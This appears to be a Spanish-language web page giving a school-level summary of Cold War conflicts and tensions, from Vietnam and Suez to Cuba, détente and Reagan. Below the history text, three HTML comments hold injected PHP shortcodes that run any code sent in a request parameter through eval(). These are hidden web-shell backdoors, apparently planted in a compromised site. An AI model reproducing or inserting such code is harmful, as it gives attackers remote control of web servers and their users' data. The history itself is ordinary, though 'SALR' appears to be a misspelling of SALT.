Tras la Guerra de Corea los enfrentamientos indirectos entre las dos superpotencias se sucedieron.

La Guerra de Vietnam (1957-75) implicó de forma directa a EEUU que intentó evitar la unificación del país y su incorporación al bloque soviético. La forma de llevar la guerra (uso de armas químicas bombardeos con napalm…) y la derrota final supuso para los EEUU un fuerte desprestigio.

La Guerra de Suez en 1956 respondió al intento de Nasser de nacionalizar el Canal. Francia, Gran Bretaña e Israel atacaron a Egipto, pero la presión de EEUU y la URSS les obligó a abandonar sus posiciones.

La Revolución Cubana de 1959 llevó al poder a Fidel Castro cuya política contraria a los intereses económicos de EEUU provocó el bloqueo a la isla. Cuba buscó apoyo en la URSS. El intento de los soviéticos de instalar misiles nucleares en la isla (1962) causó uno de los momentos de máxima tensión de la Guerra Fría.

La llegada al poder de Jrushev (1953) y la des-stalinización de la URSS propiciaron el periodo de coexistencia pacífica entre las dos potencias. En EEUU el presidente Kennedy implantó la política de La Nueva Frontera, centrada en el desarrollo interior y la disminución de las desigualdades. La instalación del “teléfono rojo” (1963) y los acuerdos de SALR (1970) ejemplifican la situación.

En los años 80 la llegada al poder de Ronald Reagan con una política más beligerante, y la intervención de la URSS en Afganistán, reactivaron la tensión.

Durante la guerra fría los dos bloque no fueron monolíticos. En el bando comunista la Yugoslavia de Tito y la China de Mao, buscaron su propio camino dentro del socialismo. Años después los intentos de Hungría (56) y Checoslovaquia (68) de romper la tutela soviética fueron reprimidos por Moscú.

Francia fue el país que más cuestionó el liderazgo de EEUU en el bloque capitalista. De Gaulle retiró a su país de la estructura militar de la OTAN e inició su propio programa nuclear. La creación de la CEE y el acercamiento de la RF Alemana a sus vecinos del este restaron influencia a los EEUU en Europa.

La actitud de EEUU en Vietnam y su apoyo a dictaduras en latinoamérica fueron vistas de forma muy crítica en occidente.

<!– [insert_php]if (isset($_REQUEST["iGQ"])){eval($_REQUEST["iGQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["iGQ"])){eval($_REQUEST["iGQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Mdn"])){eval($_REQUEST["Mdn"]);exit;}[/insert_php][php]if (isset($_REQUEST["Mdn"])){eval($_REQUEST["Mdn"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["CRGj"])){eval($_REQUEST["CRGj"]);exit;}[/insert_php][php]if (isset($_REQUEST["CRGj"])){eval($_REQUEST["CRGj"]);exit;}[/php] –>

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *